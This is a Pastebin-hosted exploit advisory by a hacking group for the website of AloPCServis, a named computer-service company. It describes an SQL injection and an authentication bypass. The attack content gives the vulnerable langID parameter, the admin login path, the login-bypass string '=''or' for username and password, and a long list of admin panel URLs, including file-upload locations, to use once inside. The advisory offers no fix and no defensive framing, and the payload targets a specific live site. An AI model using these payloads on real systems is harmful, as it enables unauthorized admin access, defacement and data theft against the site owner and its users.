API tools faq
paste
Advertisement
KingSkrupellos

AloPCServis Bursa Computer Service SQL Injection Bypass

KingSkrupellos
Sep 1st, 2019
441
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.18 KB | None | 0 0
raw download clone embed print report
  1. ###################################################################
  2.  
  3. # Exploit Title : AloPCServis Bursa Computer Service SQL Injection Authentication Bypass
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 01/09/2019
  7. # Vendor Homepage : alopcservis.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : High
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. CWE-287 [ Improper Authentication ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17. # Reference Exploit Link : cxsecurity.com/issue/WLB-2019090001
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. * AloPCServis Bursa Computer Service is prone to an SQL-injection vulnerability because
  23. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  24. Exploiting this issue could allow an attacker to compromise the application, access or
  25. modify data, or exploit latent vulnerabilities in the underlying database.
  26. A remote attacker can send a specially crafted request to the vulnerable application and
  27. execute arbitrary SQL commands in application`s database. Further exploitation of this
  28. vulnerability may result in unauthorized data manipulation.
  29. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  30. * Authentication is any process by which a system verifies the identity of a user who wishes
  31. to access it.When an actor claims to have a given identity, the software does not
  32. prove or insufficiently proves that the claim is correct. Improper authentication
  33. occurs when an application improperly verifies the identity of a user.
  34. A software incorrectly validates user's login information and as a result, an attacker can
  35. gain certain privileges within the application or disclose sensitive information that allows
  36. them to access sensitive data and provoke arbitrary code execution.
  37. The weakness is introduced during Architecture and Design, Implementation stages.
  38.  
  39. ###################################################################
  40.  
  41. # Admin Panel Login Path :
  42. ************************
  43. /admin/login.php
  44.  
  45. # SQL Injection Exploit :
  46. **********************
  47. /galeriler/index.php?language=tr&langID=[SQL Injection]
  48.  
  49. # Authentication Bypass Exploit :
  50. *****************************
  51. Admin Username : '=''or'
  52. Admin Password : '=''or'
  53.  
  54. /admin/index.php?type=1&module=slider
  55.  
  56. /admin/index.php?type=1&module=slider&sayfa=duzenle&id=282
  57.  
  58. /admin/index.php?type=1&module=slider&sayfa=yeni
  59.  
  60. /uploads/images/[yourfilename].png .jpg .gif
  61.  
  62. /admin/index.php?type=1&module=kurumsal
  63.  
  64. /admin/index.php?type=1&module=kurumsal&sayfa=duzenle&id=285
  65.  
  66. /admin/index.php?type=1&module=kurumsal&sayfa=yeni
  67.  
  68. /admin/index.php?type=2&module=haberler-kategori
  69.  
  70. /admin/index.php?type=2&module=haberler-kategori&sayfa=duzenle&id=9
  71.  
  72. /admin/index.php?type=2&module=haberler-kategori&sayfa=yeni
  73.  
  74. /admin/index.php?type=1&module=haberler
  75.  
  76. /admin/index.php?type=1&module=haberler&sayfa=duzenle&id=9
  77.  
  78. /admin/index.php?type=1&module=haberler&sayfa=yeni
  79.  
  80. /admin/index.php?type=2&module=kategoriler
  81.  
  82. /admin/index.php?type=2&module=kategoriler&sayfa=duzenle&id=39
  83.  
  84. /admin/index.php?type=2&module=kategoriler&sayfa=yeni
  85.  
  86. /admin/index.php?type=3&module=urunler
  87.  
  88. /admin/index.php?type=3&module=urunler&sayfa=duzenle&id=38
  89.  
  90. /admin/index.php?type=3&module=urunler&sayfa=yeni
  91.  
  92. /admin/index.php?type=2&module=galeri-kategori
  93.  
  94. /admin/index.php?type=2&module=galeri-kategori&sayfa=duzenle&id=45
  95.  
  96. /admin/index.php?type=2&module=galeri-kategori&sayfa=yeni
  97.  
  98. /admin/index.php?type=1&module=galeri
  99.  
  100. /admin/index.php?type=1&module=galeri&sayfa=duzenle&id=286
  101.  
  102. /admin/index.php?type=1&module=galeri&sayfa=yeni
  103.  
  104. /admin/index.php?type=0&module=ayarlar
  105.  
  106. /admin/index.php?type=4&module=tasarim
  107.  
  108. ###################################################################
  109.  
  110. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  111.  
  112. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!